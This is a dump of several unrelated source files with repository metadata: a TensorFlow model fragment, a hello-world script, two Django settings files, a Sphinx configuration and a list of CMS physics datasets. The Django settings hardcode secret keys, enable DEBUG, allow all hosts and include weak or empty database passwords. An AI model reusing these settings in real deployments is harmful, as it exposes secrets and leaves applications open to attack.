kernel_regularizer=self._l2_reg, name='output') else: if self._num_class > 1: fm_fea = tf.layers.dense( fm_fea, self._num_class, kernel_regularizer=self._l2_reg, name='fm_logits') else: fm_fea = tf.reduce_sum(fm_fea, 1, keepdims=True) deep_fea = tf.layers.dense( deep_fea, self._num_class, kernel_regularizer=self._l2_reg, name='deep_logits') output = wide_fea + fm_fea + deep_fea self._add_to_prediction_dict(output) return self._prediction_dict
54dda2fd3569a59243cb0d5b8b7dda99f42080cb
ad6ffe99c0ec781b0bb286ce5cb10ca3735bde97
/hello-docstring.py
6af55db124aa30b82bd510f054f9bb043640e19d
[ "MIT" ]
permissive
crunchy-devops/tp-bac-4
db7f9ac3824bfcf7cd8b3570c6d45284be53b9d0
4784d9c0505ad62bcad7b28d536826126ded435c
refs/heads/master
2023-02-26T09:18:31.182264
2021-02-01T09:26:27
2021-02-01T09:26:27
330,283,640
0
10
null
null
null
null
UTF-8
Python
false
false
118
py
#!/usr/bin/env python3 """ Author: Herve Meftah <[email protected]> Purpose: Say hello """ print('Hello, World!')
50664041a00a4b4add3e5bafe2d2107d1fb5a4e5
43c398156b5fdab29a533d97e612a242aa2f4a75
/Intern/Demo/Demo/settings.py
8ec3c8dc64f8d65796d1637c1225e11f8402e312
[]
no_license
shahriya2402/leave_management_system
7f501d8c5470d4e7499c65ebf96ab793c8e38cdb
be665cf0bb48a30868967dc874ebabb8d770139a
refs/heads/main
2023-04-14T17:53:17.809060
2021-05-04T10:23:58
2021-05-04T10:23:58
364,204,874
0
0
null
null
null
null
UTF-8
Python
false
false
4,161
py
""" Django settings for Demo project. Generated by 'django-admin startproject' using Django 3.2. For more information on this file, see https://docs.djangoproject.com/en/3.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.2/ref/settings/ """ import mimetypes from pathlib import Path # Build paths inside the project like this: BASE_DIR / 'subdir'. from django.contrib import messages BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'django-insecure-5iprpo!b*uki216i2%n!7$2e+rw_k8+t3rj23c)e+-9d$d3k^b' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'leave.apps.LeaveConfig', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'Demo.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': ['templates'], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'Demo.wsgi.application' # Database # https://docs.djangoproject.com/en/3.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.mysql', 'NAME': 'management', 'USER': 'root', 'PASSWORD': '', 'HOST': 'localhost', 'PORT': '3306', 'OPTIONS': { 'init_command': "SET sql_mode='STRICT_TRANS_TABLES'" } } } # Password validation # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.2/howto/static-files/ STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field MEDIA_ROOT = 'static/img' MEDIA_URL = '/img/' STATIC_URL = '/static/' STATICFILES_DIRS = [ BASE_DIR / "static", '/var/www/static/', ] mimetypes.add_type("text/css", ".css", True) mimetypes.add_type("text/javascript", ".js", True) MESSAGE_TAGS = { messages.ERROR: 'danger' } STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field MEDIA_ROOT = 'static/img' MEDIA_URL = '/img/' STATIC_URL = '/static/' STATICFILES_DIRS = [ BASE_DIR / "static", '/var/www/static/', ] mimetypes.add_type("text/css", ".css", True) mimetypes.add_type("text/javascript", ".js", True) MESSAGE_TAGS = { messages.ERROR: 'danger' }
c55f78c2df8746a0df7070531eb25fabfb0272d6
845c4bd2ff1aba9172cb760a1b77dc1fa5b2ce3d
/doc/conf.py
c310bca4c701a40c5e2b3d88b3090edb922701a8
[]
no_license
fmi-tools/py-fmipp
0cea73658f07f675b09edae6ba6325cda6bdc87e
e39b80c65e375832c6839a7c2a9edb4117ae409d
refs/heads/master
2023-08-16T18:09:06.182871
2022-11-22T15:38:07
2022-11-22T15:38:07
222,248,323
0
1
null
2019-11-17T12:58:34
2019-11-17T12:58:33
null
UTF-8
Python
false
false
5,603
py
# -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. For a # full list see the documentation: # http://www.sphinx-doc.org/en/master/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # # import os # import sys # sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'The FMI++ Python Interface' copyright = 'AIT Austrian Institute of Technology GmbH' author = 'AIT FMI++ Development Team' # The short X.Y version version = '2.0' # The full version, including alpha/beta/rc tags release = '2.0.0' # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.extlinks' ] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = None # -- Options for HTML output ------------------------------------------------- # The name of an image file (relative to this directory) to place at the top of the sidebar. html_logo = 'img/logo_fmipp.svg' # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don't match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``['localtoc.html', 'relations.html', 'sourcelink.html', # 'searchbox.html']``. # # html_sidebars = {} # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = 'PyFMIPP' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'PyFMIPP.tex', 'The FMI++ Python Interface', 'AIT FMI++ Development Team', 'manual'), ] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'fmipp', 'The FMI++ Python Interface', [author], 1) ] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'PyFMIPP', 'The FMI++ Python Interface', author, 'PyFMIPP', 'The FMI++ Python Interface is a Python wrapper for the FMI++ Library', 'Miscellaneous'), ] # -- Options for Epub output ------------------------------------------------- # Bibliographic Dublin Core info. epub_title = project # The unique identifier of the text. This can be a ISBN number # or the project homepage. # # epub_identifier = '' # A unique identification for the text. # # epub_uid = '' # A list of files that should not be packed into the epub file. epub_exclude_files = ['search.html'] # External link library extlinks = { 'github_blob': ('https://github.com/fmipp/py-fmipp/blob/main/%s', ''), 'github_tree': ('https://github.com/fmipp/py-fmipp/tree/main/%s', ''), }
c3952e3f2d8c1e4e37d335f16d761e86e26fa2f7
c0e50f13fe0e20a974b7aeb7db5d5018ecc9a1aa
/DjangoRestApis/settings.py
12c1f47d386f10f97e06b9da39b0f6efde832eb5
[]
no_license
ducquang2/DjangoRestApis
4c39b1818caf27396e7af8163c7e661f2813268e
38f503c5e387b6e6a7297f84c258ad2fdb3669d7
refs/heads/master
2023-02-20T05:15:40.566619
2021-01-26T07:51:34
2021-01-26T07:51:34
332,125,499
4
0
null
null
null
null
UTF-8
Python
false
false
3,770
py
""" Django settings for DjangoRestApis project. Generated by 'django-admin startproject' using Django 3.1.5. For more information on this file, see https://docs.djangoproject.com/en/3.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.1/ref/settings/ """ from pathlib import Path # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '(a6+e3mbyv3y6b^^_mkpawrd()i66o-f9muuepiin%5f@hth#0' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'rest_framework', # Tutorials application 'tutorials.apps.TutorialsConfig', # CORS 'corsheaders', ] MIDDLEWARE = [ # CORS 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'DjangoRestApis.urls' REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': [ 'rest_framework_simplejwt.authentication.JWTAuthentication', ], } TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'DjangoRestApis.wsgi.application' # Database # https://docs.djangoproject.com/en/3.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', 'USER': 'quang', 'PASSWORD': '123', 'HOST': '127.0.0.1', 'PORT': '5432', } } # Password validation # https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.1/howto/static-files/ STATIC_URL = '/static/' ALLOWED_HOSTS = ['*'] CORS_ORIGIN_ALLOW_ALL = False CORS_ORIGIN_WHITELIST = ( 'http://localhost:8081', 'http://localhost:8082', 'http://192.168.1.204:8082', 'http://172.16.4.177:8082', 'http://172.16.4.227:1234', )
544535a12e8aebb81a573d170387a9a53d5e9f99
1e21f0939d4c46db8eeca9fa8ef034ed14b7a549
/PhotonTnP_SampleProduction/crab/tnpDatasetDef.py
948c5aa42935bdee103b37980cbee893ae9ef5e9
[]
no_license
Ming-Yan/photonTnp
4e46286998d4e2806e423e2e27893c0a8675494f
5468bea3eff51b21eed2701cda4f3e5d2ad9e6bf
refs/heads/master
2021-10-08T20:33:55.910375
2018-10-22T09:12:26
2018-10-22T09:12:26
162,109,988
0
0
null
null
null
null
UTF-8
Python
false
false
19,961
py
datasetsForTnP = [ {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Spring16_reHLT', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Spring16_reHLT.root', 'lumi': -1, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.767, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.646, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.353, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 3.985, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.160, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.539, 'nEvts': -1}, {'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 8.762, 'nEvts': -1}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_DYToLL_madgraph_Winter2017//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Winter2017', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Winter2017.root', 'lumi': -1, 'nEvts': 49748967}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.899, 'nEvts': 238592033}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.646, 'nEvts': 93326652}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.353, 'nEvts': 146480008}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 4.050, 'nEvts': 113169852}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.160, 'nEvts': 70143321}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.391, 'nEvts': 148781520}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016prompt_RunHv2//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 8.762, 'nEvts': 123900510}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.349, 'nEvts': 235522176}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.363, 'nEvts': 92067646}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.256, 'nEvts': 146495223}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 3.981, 'nEvts': 111208237}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.105, 'nEvts': 70143321}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.544, 'nEvts': 152098617}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunH//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 6.105, 'nEvts': 89863172}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph.root', 'lumi': -1, 'nEvts': 33584160}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunB.root', 'lumi': -1, 'nEvts': 7384544}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunC.root', 'lumi': -1, 'nEvts': 79103372}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunD.root', 'lumi': -1, 'nEvts': 124968333}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunF.root', 'lumi': -1, 'nEvts': 64744869}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunG.root', 'lumi': -1, 'nEvts': 138296792}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph.root', 'lumi': -1, 'nEvts': 44983870}, {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': -1, 'nEvts': 116256313}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.364, 'nEvts': 236233675}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 1.810, 'nEvts': 70759545}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.241, 'nEvts': 145990095}, # {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 